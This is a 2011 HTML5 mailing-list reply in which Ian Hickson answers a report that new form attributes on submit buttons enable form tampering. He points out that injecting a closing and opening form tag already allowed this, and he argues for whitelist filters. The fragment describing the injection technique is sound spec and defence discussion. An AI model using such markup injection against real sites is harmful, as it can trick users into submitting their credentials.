Re: [html5] Input attributes allow form tampering

On Tue, 2 Aug 2011, Philippe De Ryck wrote:
>
> The new form attributes, which can be used with submit buttons, can make 
> it difficult for a user to distinguish the form that is being submitted. 
> This can be used by an adversary to trick the user into submitting a 
> form, such as an autocompleted login form. Even though this attack was 
> already possible with JavaScript enabled, this new vector does not 
> depend on scripts. Additionally, it is possible that current content 
> validation filters do not yet prevent against button injection.

Surely this was already possible by just injecting </form><form action...> 
in the same place as the button would be inserted today?


> Alternatively, if changing the specification is not possible, developers 
> should be warned about this attack vector, so they can update their 
> content filters.

Filters must be written using whitelists. A filter written using a 
blacklist is essentially worthless. A whitelist filter would not be 
affected by this or many other additions to HTML.

-- 
Ian Hickson               U+1047E                )\._.,--....,'``.    fL
http://ln.hixie.ch/       U+263A                /,   _.. \   _\  ;`._ ,.
Things that are impossible just take longer.   `._.-(,_..'--(,_..'`-.;.'

Received on Tuesday, 2 August 2011 21:51:21 UTC